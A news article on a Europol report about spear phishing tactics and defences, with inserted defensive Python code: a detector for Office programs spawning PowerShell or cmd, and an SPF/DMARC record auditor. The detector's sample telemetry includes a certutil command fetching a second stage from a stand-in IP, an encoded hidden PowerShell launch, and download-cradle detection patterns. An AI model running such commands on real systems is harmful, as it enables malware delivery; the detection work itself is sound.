
Europol on Methodology Behind Successful Spear Phishing Attacks

"Spear phishing... remains the principal attack vector for most cybercrimes," says Europol in a new report. Sixty-five percent of targeted attack groups use it as their primary infection vector, while 32% of breaches involve phishing. During 2018, up to 0.55 % of all incoming emails were phishing emails, while phishing was present in 78% of cyber espionage incidents.

As part of its effort to combat cybercrime, Europol has established advisory groups for financial services, communication providers and internet security. It meets with private sector partners in these groups to discuss industry-specific cybercrime threats and trends, and to develop joint public/private action plans.

Over two days in March 2019, 70 global financial institutions, internet security firms, and telecommunications providers met and shared insights on phishing. Now Europol has published (PDF) the outcome of that meeting in what it describes as "a unique, law enforcement-industry view on the threat of spear phishing."

Steven Wilson, Head of Europol's European Cybercrime Centre commented: "Spear phishing is a major enabler of some of the most serious forms of cybercrime, especially ransomware, and can cause real harm to European citizens and organisations. We can only tackle a threat of this scale effectively by working closely with key partners from across industry. The EC3 Advisory Groups and this report are a reflection of our ongoing cooperation to tackle the threat from cybercrime."

The report largely ignores scatter-gun, spam-based phishing campaigns. These are more easily detected and blocked. A reconnaissance-based targeted attack against a specific individual is a different matter. The problem is that the reconnaissance phase is simple and requires no technical expertise. Primarily, phishers' data comes from two sources -- the target company's own online presence, and the phish recipient's personal information from social media accounts.

From the first, a key source is the job listings that companies post. "A typical vacancy notice," says Europol, "not only covers detailed descriptions of the tasks and responsibilities for a specific role in the organisation in question (processes), but also often includes information about whom the job holder reports to and manages (structure), as well as what skills and knowledge are needed (software)." From social media accounts, the attackers can learn personal interests and hobbies, and relationships with colleagues within the target organization. All that then remains for a compelling spear phishing attack is the target's email address -- and this can usually be obtained, or reliably guessed, by services such as hunter.io.

The attack phase involves persuading the target that the email has come from a trusted source or person. This means sending it from a genuine company mailbox that the attacker has compromised (the basis of business email compromise, or BEC, and of the newer variant known as vendor email compromise), from a spoofed company address, or from a look-alike domain. The email itself will either link to a phishing website (to harvest credentials or deliver malware), link to a malicious file the recipient is persuaded to download and open, or carry a weaponized attachment that the recipient is persuaded to open.

Forty-eight percent of malicious attachments are now Office documents. Many of these carry macro-based attacks that are effectively fileless: the macro hands execution to a script host such as PowerShell, so no malware executable is written to the endpoint for signature-based anti-malware engines to find. In this type of attack, the entire purpose of the well-constructed and well-researched email is to persuade the recipient to trust it and enable macros, which Office will not run without the user's consent.
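As an added illustration (not from the Europol report or this article), the parent/child process relationship that such a macro leaves in endpoint telemetry is what a detection engineer hunts for. The Python below scores Sysmon-style process-creation events, flagging an Office application that spawns a script host and raising the score for the command-line traits such macros typically use. The field names follow Sysmon Event ID 1; the events, install paths and the encoded blob are constructed for the example.

```python
"""Hunt for Office applications spawning script hosts, the tell-tale of a
macro that went 'fileless' by handing execution to PowerShell, cmd, wscript
and friends. Records use Sysmon Event ID 1 (process creation) field names;
the sample events at the bottom are constructed for this example."""
import re

# Office processes a malicious macro runs inside.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Script hosts and living-off-the-land binaries a macro typically launches
# so that no dropped executable has to touch disk.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# Command-line traits that raise the score once an Office-to-script-host
# chain is seen. Each hit adds 20 to the base score of 50.
CMDLINE_MARKERS = {
    "encoded command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|urlcache",
        re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop\b|-noprofile\b", re.I),
}


def _basename(path: str) -> str:
    """Last path component, lower-cased, accepting either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation record; 0 means nothing to see."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        score += 50
        reasons.append(f"{parent} spawned {child}")
        for name, pattern in CMDLINE_MARKERS.items():
            if pattern.search(cmdline):
                score += 20
                reasons.append(name)
    return score, reasons


def detect(events, threshold: int = 50) -> list[dict]:
    """Return an alert for every event scoring at or above threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"score": score, "reasons": reasons,
                           "user": ev.get("User"), "cmdline": ev.get("CommandLine")})
    return alerts


# Constructed sample telemetry (not real logs). Paths are typical defaults.
OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Benign: Word hands a print job to the 32-bit print helper.
    {"ParentImage": OFFICE16 + r"\WINWORD.EXE", "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288", "User": r"CORP\alice"},
    # Benign: an administrator runs a script from a console.
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File .\backup.ps1", "User": r"CORP\bob"},
    # Macro: Word launches hidden, profile-less PowerShell with an encoded
    # command (the blob is a placeholder, not a real payload).
    {"ParentImage": OFFICE16 + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + "A" * 40, "User": r"CORP\alice"},
    # Macro: Excel runs cmd, which pulls a second stage with certutil.
    {"ParentImage": OFFICE16 + r"\EXCEL.EXE", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/x.txt %TEMP%\x.txt",
     "User": r"CORP\carol"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["score"], alert["user"], "; ".join(alert["reasons"]))
```

The two benign events score zero because the parent/child pair is the gate: a console user running PowerShell is ordinary, a word processor doing it is not. In production the same logic is usually expressed as a SIEM or EDR rule on ParentImage and Image, with the command-line markers used to prioritise rather than to decide.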

Europol believes that defense against spear phishing is a combination of technical solutions and user awareness. The technical solutions are a combination of policy and software. Policy solutions include blocking unsigned macros and enforcing two-factor authentication, but also more involved measures such as publishing a Sender Policy Framework (SPF) record in DNS and implementing Domain-based Message Authentication, Reporting and Conformance (DMARC). DMARC is a widely recommended answer to phishing, or more specifically to phishing that spoofs the company's own domain: it tells receiving mail servers to quarantine or reject messages that claim to come from the domain but fail SPF or DKIM alignment. It does nothing against look-alike domains or mail sent from a compromised legitimate mailbox, it only works where the receiving side enforces it, and take-up has so far been patchy.

Europol's own Internet Organised Crime Threat Assessment 2019 report (PDF, published in October 2019) states, "according to one study, DMARC adoption is non-existent at 80% of organisations." Without widespread adoption on both the sending and the receiving side, DMARC offers little protection against the wider phishing problem.
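As an added example, not from the report or this article, here is the kind of check a practitioner would run against their own domains before trusting that "having a DMARC record" means anything. The Python below parses SPF and DMARC TXT records and flags the settings that leave a domain spoofable: a monitor-only p=none, a partial pct, missing aggregate reporting, a permissive +all or ?all, the deprecated ptr mechanism, and the ten-lookup limit from RFC 7208. The records and the example.com/example.net names are constructed; a real audit would fetch the TXT records with a resolver.

```python
"""Audit SPF and DMARC TXT records for the weaknesses that leave a domain
spoofable even though 'a record exists'. The records below are constructed
for this example; in practice you would fetch them with a DNS resolver."""


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def audit_dmarc(record: str) -> list[str]:
    """Return a list of findings; an empty list means the policy is enforcing."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["not a DMARC record: missing v=DMARC1"]
    findings = []
    policy = tags.get("p", "").lower()
    if policy not in {"none", "quarantine", "reject"}:
        findings.append("missing or invalid p= tag: receivers will ignore the record")
    elif policy == "none":
        findings.append("p=none: monitoring only, spoofed mail is still delivered")
    # sp= defaults to p=, so only an explicit weaker subdomain policy is a finding.
    if tags.get("sp", policy).lower() == "none" and policy != "none":
        findings.append("sp=none: subdomains of the organisation remain spoofable")
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100  # malformed pct is treated as the default by receivers
    if pct < 100:
        findings.append(f"pct={pct}: policy applied to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address: no aggregate reports, so abuse of the domain goes unseen")
    return findings


# Terms that cost a DNS lookup; RFC 7208 section 4.6.4 caps them at 10.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def audit_spf(record: str) -> list[str]:
    """Return findings for an SPF record: weak 'all' qualifier, lookup limit, ptr."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record: missing v=spf1"]
    findings, lookups, all_qualifier = [], 0, None
    for term in terms[1:]:
        t = term.lower()
        qualifier = "+"  # an unqualified mechanism means Pass
        if t[0] in "+-~?":
            qualifier, t = t[0], t[1:]
        name = t.split(":", 1)[0].split("/", 1)[0].split("=", 1)[0]
        if name == "all":
            all_qualifier = qualifier
        elif name in LOOKUP_TERMS:
            lookups += 1
            if name == "ptr":
                findings.append("ptr mechanism: deprecated by RFC 7208, slow and unreliable")
    if all_qualifier is None and not any(x.lower().startswith("redirect=") for x in terms):
        findings.append("no 'all' term: unlisted senders get a Neutral result")
    elif all_qualifier == "+":
        findings.append("+all: every host on the internet passes SPF for this domain")
    elif all_qualifier == "?":
        findings.append("?all: neutral for unlisted senders, effectively no policy")
    if lookups > 10:
        findings.append(f"{lookups} DNS lookups: over the limit of 10, evaluates to permerror")
    return findings


# Constructed records: a weak pair beside a hardened pair.
WEAK_DMARC = "v=DMARC1; p=none; pct=50"
STRONG_DMARC = ("v=DMARC1; p=reject; sp=reject; pct=100; adkim=s; aspf=s; "
                "rua=mailto:dmarc-rua@example.com")
WEAK_SPF = "v=spf1 a mx ptr include:_spf.example.net +all"
STRONG_SPF = "v=spf1 ip4:198.51.100.0/24 include:_spf.example.net -all"

if __name__ == "__main__":
    for label, record, audit in [("weak DMARC", WEAK_DMARC, audit_dmarc),
                                 ("strong DMARC", STRONG_DMARC, audit_dmarc),
                                 ("weak SPF", WEAK_SPF, audit_spf),
                                 ("strong SPF", STRONG_SPF, audit_spf)]:
        print(label, "->", audit(record) or ["ok"])
```

The weak pair is the common real-world shape: an SPF record that ends in +all authorises the whole internet, and a DMARC record at p=none with no rua address neither blocks spoofed mail nor tells the owner it is happening. Note that a clean result here says nothing about look-alike domains, which these records cannot cover.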

The report does not highlight any specific anti-phishing software products, but it does list some of the elements that go into them and that companies can apply directly. These include blocking mail from known malicious IP addresses and domains using DNS-based blocklists, and blocking emails that ask for credentials or other personal information. It also notes that "with the continuous progress made in artificial intelligence and machine learning, it may well be possible to use these techniques to help optimise successful detection and filtering of even sophisticated phishing attacks." One school of thought, however, holds that machine learning will never be the best solution to spear phishing because the data pool from which the machine learns is too small for the accuracy it needs. This is not a universally held opinion.

The report gives some prominence to user awareness, listing the types of phishing clue that users can be taught to recognize. It adds that awareness and education can "be achieved by systematically attacking users with real case scenarios by means of a phishing simulation (phish your own employee) with appropriate follow-up steps taken depending on the click-through-rates (CTRs) of the staff (increasing difficulty for good performers and providing tailored guidance for others)."

There is no doubt that the market for readymade 'simulated phishing' products is expanding rapidly. Despite this, a survey conducted by GetApp in September 2019 found that only 30% of companies conduct any phishing testing on their staff. Furthermore, it is unclear whether stepping up phish training will create new problems of its own. A separate report from Agari suggests that user-reported phishing attempts are rising far faster than security staffing can handle. Many of these reports are false positives, but all need to be investigated. With increased time pressure on the staff triaging them, there is a growing danger that some genuine phishing attempts will slip through.

The danger in automated phish training is that it can persuade users to report anything even slightly unusual, whether or not it is malicious. Indeed, the Europol report stresses, "If in doubt, the email should be forwarded as an attachment to a dedicated contact point within the targeted organisation." Since the user cannot tell whether an email is a real phish or a simulated one, he or she ends up flagging it as a phish for fear of failing the test.

While there are policy, technology and training solutions that can help mitigate the spear phishing threat, none of them appears to be foolproof. Spear phishing, already perhaps the major threat to businesses, will continue to grow. Notably, in its final section the report almost seems to be making its excuses in advance. The section concerns the loss of public WHOIS data after GDPR came into force. "WHOIS information no longer being directly available for law enforcement, public safety agencies and cyber security researchers," it warns, "significantly harms the public interest, the rule of law online and undermines efforts to investigate and prevent cybercriminal spear phishing campaigns."

Related: Iranian Hackers Update Spear-Phishing Techniques in Recent Campaign 

Related: Facebook Awards $100,000 Prize for Spear-Phishing Detection Method 

Related: Phishing Attacks Hit the C-Suite With High Value Scams 

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.